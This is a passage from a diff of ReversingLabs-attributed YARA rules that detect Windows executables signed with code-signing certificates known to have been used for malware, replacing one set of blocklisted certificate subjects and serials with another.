+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Tony Yeh" and pe.signatures [ i ] . serial == "08:60:c8:a7:ed:18:c3:f0:30:a3:27:22:fd:2b:22:0c" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_277Cd16De5D61B9398B645Afe41C09C7 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Fdadd0740572270203F8138692C4A83 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d863faac-7b6e-5e1d-960f-8379347c6838"
+		id = "0b289c4e-c564-5513-a1a5-42e8551c6218"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8658-L8674"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "696467d699dec060b205f36f53dbe157b241823757d72798b35235d6530fd193"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1600-L1616"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "18ce7ed721a454c5bb3cd6ab26df703b1e08b94b8c518055feffa38ad42afa50"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11215,21 +35880,21 @@ rule REVERSINGLABS_Cert_Blocklist_277Cd16De5D61B9398B645Afe41C09C7 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE SIGN COMPANY LIMITED" and pe.signatures [ i ] . serial == "27:7c:d1:6d:e5:d6:1b:93:98:b6:45:af:e4:1c:09:c7" and 1619049600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, William Zoltan" and pe.signatures [ i ] . serial == "2f:da:dd:07:40:57:22:70:20:3f:81:38:69:2c:4a:83" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D0Eda76C13D30C97015708790Bb94214 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Fc13D6220C629043A26F81B1Cad72D8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "aa323bac-a9f5-560f-b44a-3cf2b26351bb"
+		id = "c2573adc-6580-58aa-a58c-c21bf6b79364"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8676-L8694"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2112ebfb7c9ebbbccb20cefcd23bb49142da770feb16ee8eef5eb27646226785"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1618-L1634"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5572c278f6c9be62b2bba09ea610fd170438c6893ee5283ff4a5b3bb2852b07b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11239,21 +35904,21 @@ rule REVERSINGLABS_Cert_Blocklist_D0Eda76C13D30C97015708790Bb94214 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LAEN ApS" and ( pe.signatures [ i ] . serial == "00:d0:ed:a7:6c:13:d3:0c:97:01:57:08:79:0b:b9:42:14" or pe.signatures [ i ] . serial == "d0:ed:a7:6c:13:d3:0c:97:01:57:08:79:0b:b9:42:14" ) and 1619136000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, meicun ge" and pe.signatures [ i ] . serial == "4f:c1:3d:62:20:c6:29:04:3a:26:f8:1b:1c:ad:72:d8" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6333Ed618F88A05B4D82Ad7Bf66Cb0Fa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3457A918C6D3701B2Eaca6A92474A7Cc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c4d3603e-57e2-57df-a055-c43d449242c7"
+		id = "12526715-7b54-5c31-aa2a-b77ed067e3ee"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8696-L8712"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b088ac4b74a8cf3dddb67c8de2b7c3c5f537287a0454c0030c0eb4069c465c7d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1636-L1652"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "70d4bece52a86bfe8958f6d4195b833cea609596e3b68bb90087c262501bd462"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11263,21 +35928,21 @@ rule REVERSINGLABS_Cert_Blocklist_6333Ed618F88A05B4D82Ad7Bf66Cb0Fa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RHM LIMITED" and pe.signatures [ i ] . serial == "63:33:ed:61:8f:88:a0:5b:4d:82:ad:7b:f6:6c:b0:fa" and 1616457600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KONSALTING PLUS OOO" and pe.signatures [ i ] . serial == "34:57:a9:18:c6:d3:70:1b:2e:ac:a6:a9:24:74:a7:cc" and 1432252799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3B777165B125Bccc181D0Bac3F5B55B3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_621Ed8265B0Ad872D9F4B4Ed6D560513 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f065e99f-9cce-55cb-a592-60b89c26028a"
+		id = "b64e640c-264f-597c-90a5-d0ad57aa5075"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8714-L8730"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "80aff3d6f45f5847d5d39b170b9d0e70168d02569ca6d86a2c39150399d290fc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1654-L1670"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c133d6eea5d27e597d0a656c7c930a5ca84adb46aa2fec66381b6b5c759e22aa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11287,21 +35952,21 @@ rule REVERSINGLABS_Cert_Blocklist_3B777165B125Bccc181D0Bac3F5B55B3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STAND ALONE MUSIC LTD" and pe.signatures [ i ] . serial == "3b:77:71:65:b1:25:bc:cc:18:1d:0b:ac:3f:5b:55:b3" and 1607299200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fan Li" and pe.signatures [ i ] . serial == "62:1e:d8:26:5b:0a:d8:72:d9:f4:b4:ed:6d:56:05:13" and 1413183357 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5B37Ac3479283B6F9D75Ddf0F8742D06 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_56E22B992B4C7F1Afeac1D63B492Bf54 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cc124d3f-2446-57a2-a206-0a5e569fc703"
+		id = "28609e75-47cb-5017-bb92-046a9e8931c6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8732-L8748"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b7abd389ac31cd970e6611c7c303714fdd658f45d4857ad524f5e8368edbb875"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1672-L1688"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ef058c0ec352260fa3db0fc74331d1da3c9eb8d161cef7635632fd7c569198c6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11311,21 +35976,21 @@ rule REVERSINGLABS_Cert_Blocklist_5B37Ac3479283B6F9D75Ddf0F8742D06 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ART BOOK PHOTO s.r.o." and pe.signatures [ i ] . serial == "5b:37:ac:34:79:28:3b:6f:9d:75:dd:f0:f8:74:2d:06" and 1619740800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Hetem Ramadani" and pe.signatures [ i ] . serial == "56:e2:2b:99:2b:4c:7f:1a:fe:ac:1d:63:b4:92:bf:54" and 1435622399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3112C69D460C781Fd649C71E61Bfec82 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Bc3Bae4118D46F3Fdd9Beeeab749Fee : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f4d2f240-49a7-51f3-8db1-1c569aa63177"
+		id = "0d2f1f5f-119a-5069-abcb-e4e93d9964c3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8750-L8766"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ed31b0a24d18a451163867f0f49df12af3ca0768f250ac8ce66d41405393130d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1690-L1706"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fcbda27f8bf4dca8aa32103bb344380c82f0c701c25766df94c182ef94805a12"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11335,21 +36000,21 @@ rule REVERSINGLABS_Cert_Blocklist_3112C69D460C781Fd649C71E61Bfec82 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KREATURHANDLER BJARNE ANDERSEN ApS" and pe.signatures [ i ] . serial == "31:12:c6:9d:46:0c:78:1f:d6:49:c7:1e:61:bf:ec:82" and 1614902400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x9D\\x8E\\xE9\\x9B\\xAA\\xE6\\xA2\\x85" and pe.signatures [ i ] . serial == "3b:c3:ba:e4:11:8d:46:f3:fd:d9:be:ee:ab:74:9f:ee" and 1442275199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A5B4F67Ad8B22Afc2Debe6Ce5F8F679 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0F0449F7691E5B4C8E74E71Cae822179 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7dd5ba42-2d04-52d7-b15a-2bdba2e742fb"
+		id = "17c99772-f2f9-56bc-be01-d9f62626a9ff"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8768-L8784"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "938efb7ee19970484aded5cd46b2ff730f8882706bec3f062bdebde3cc9a4799"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1708-L1724"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f8d3593b357f27240a4399e877ae9044f783bb944ad47ec9fe8bbecc63be864c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11359,21 +36024,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A5B4F67Ad8B22Afc2Debe6Ce5F8F679 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Farad LLC" and pe.signatures [ i ] . serial == "0a:5b:4f:67:ad:8b:22:af:c2:de:be:6c:e5:f8:f6:79" and 1607472000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SBO INVEST" and pe.signatures [ i ] . serial == "0f:04:49:f7:69:1e:5b:4c:8e:74:e7:1c:ae:82:21:79" and 1432079999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Df45B36C9D0Bd248C3F9494E7Ca822 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_43Db4448D870D7Bdc275F36A01Fba36F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d7d0d1c4-b341-5651-8179-4035f537ba98"
+		id = "47b3e681-87ae-5e70-8d02-18aa0daab0dc"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8786-L8804"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9c03522376b0d807cd36a0641e474d770bc3b4f8221f26d232878d2d320d072b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1726-L1742"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "951e35e2c3f1bd90a33f8b76b6ede5686ee9b9c97a4c71df5b9dff15956209c5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11383,21 +36048,21 @@ rule REVERSINGLABS_Cert_Blocklist_Df45B36C9D0Bd248C3F9494E7Ca822 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MPO STORITVE d.o.o." and ( pe.signatures [ i ] . serial == "00:df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" or pe.signatures [ i ] . serial == "df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" ) and 1619740800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3-T TOV" and pe.signatures [ i ] . serial == "43:db:44:48:d8:70:d7:bd:c2:75:f3:6a:01:fb:a3:6f" and 1436227199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1Ae3C4Eccecda2127D43Be390A850Dda : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2880A7F7Ff2D334Aa08744A8754Fab2C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a9d8906b-64f6-5c5d-80e0-ab916e83b613"
+		id = "b079b564-9284-59b6-9703-4e33f2b2c44d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8806-L8822"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8a2ff4f7a5ac996127778b1670e79291bddcb5dee6e7da2b540fd254537ee27e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1744-L1760"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "03c7e1251c44e8824ae3b648a95cf34f4c56db65d76806306a062a343981d87f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11407,21 +36072,21 @@ rule REVERSINGLABS_Cert_Blocklist_1Ae3C4Eccecda2127D43Be390A850Dda : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PARTYNET LIMITED" and pe.signatures [ i ] . serial == "1a:e3:c4:ec:ce:cd:a2:12:7d:43:be:39:0a:85:0d:da" and 1614902400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Garena Online Pte Ltd" and pe.signatures [ i ] . serial == "28:80:a7:f7:ff:2d:33:4a:a0:87:44:a8:75:4f:ab:2c" and 1393891199 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2E36360538624C9B1Afd78A2Fb756028 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0492F5C18E26Fa0Cd7E15067674Aff1C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "549a566b-0c94-516c-9231-a5e54136785f"
+		id = "6a176d4a-5d3e-5184-b923-12d561e7034a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8824-L8840"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9cbb50c7d383048fd506506fa9ee8bf7c6d82feaf21bcde4008ab99b82e234a7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1762-L1778"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d47d59d7680000d6c35181be2d9b034c2ecb7ca754a39c8e11750ddd7246b47c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11431,21 +36096,21 @@ rule REVERSINGLABS_Cert_Blocklist_2E36360538624C9B1Afd78A2Fb756028 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ts Trade ApS" and pe.signatures [ i ] . serial == "2e:36:36:05:38:62:4c:9b:1a:fd:78:a2:fb:75:60:28" and 1615766400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ghada Saffarini" and pe.signatures [ i ] . serial == "04:92:f5:c1:8e:26:fa:0c:d7:e1:50:67:67:4a:ff:1c" and 1445990399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Addb899F8229Fd53E6435E08Bbd3A733 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6Aa668Cd6A9De1Fdd476Ea8225326937 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1e5f0577-ba05-5e43-a817-c75f65547c3d"
+		id = "bfff2210-8545-594d-8674-243e57e3dd09"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8842-L8860"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ecb8e31b8c56b92cef601618e0adc2f6d88999318805b92389693aa9e8050d18"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1780-L1796"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "706e16995af40a6c9176dcbca07fb406f2efe4d47dbd9629d1a6b1ab1d09b045"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11455,21 +36120,21 @@ rule REVERSINGLABS_Cert_Blocklist_Addb899F8229Fd53E6435E08Bbd3A733 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "U.K. STEEL EXPORTS LIMITED" and ( pe.signatures [ i ] . serial == "00:ad:db:89:9f:82:29:fd:53:e6:43:5e:08:bb:d3:a7:33" or pe.signatures [ i ] . serial == "ad:db:89:9f:82:29:fd:53:e6:43:5e:08:bb:d3:a7:33" ) and 1616630400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BSCP LIMITED" and pe.signatures [ i ] . serial == "6a:a6:68:cd:6a:9d:e1:fd:d4:76:ea:82:25:32:69:37" and 1441583999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C1A1Db95D7Bf80290Aa6E82D8F8F996A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Cb06Dccb482255728671Ea12Ac41620 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c04a2731-5eb8-5db4-9e88-cab9b61952e4"
+		id = "5a7f61a4-15ba-5f5c-89e1-b8b986e13f19"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8862-L8880"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "84c7c0e53facadcdfd752e9cf3811fbfd6aac4bef4109acf430a67b6dcd37bfc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1798-L1814"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e0867ffe2ddd28282fe78b27b3b12ebac525b33a27dd242bc6f55bcd2e066a18"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11479,21 +36144,21 @@ rule REVERSINGLABS_Cert_Blocklist_C1A1Db95D7Bf80290Aa6E82D8F8F996A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Software Two Pty Ltd" and ( pe.signatures [ i ] . serial == "00:c1:a1:db:95:d7:bf:80:29:0a:a6:e8:2d:8f:8f:99:6a" or pe.signatures [ i ] . serial == "c1:a1:db:95:d7:bf:80:29:0a:a6:e8:2d:8f:8f:99:6a" ) and 1615334400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fangzhen Li" and pe.signatures [ i ] . serial == "1c:b0:6d:cc:b4:82:25:57:28:67:1e:a1:2a:c4:16:20" and 1445126399 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C667Ffe3A5B0A5Ae7Cf3A9E41682E91B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_370C2467C41D6019Bbecd72E00C5D73D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "83a5e5c2-0932-526b-80aa-800b37088bbd"
+		id = "18c5d1bb-21b8-5157-a03b-8bcbdc74c0cd"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8882-L8900"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "be2cd688f2d7c458ee764bd7a7250e0116328702db5585b444d631f05cdc701b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1816-L1832"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2b99522b75ee83d85b30146cb292b5a8a46dc300fb43dd9d39d9ca96c9d32d9b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11503,21 +36168,21 @@ rule REVERSINGLABS_Cert_Blocklist_C667Ffe3A5B0A5Ae7Cf3A9E41682E91B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and ( pe.signatures [ i ] . serial == "00:c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" or pe.signatures [ i ] . serial == "c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" ) and 1616976000 <= pe.signatures [ i ] . not_after )
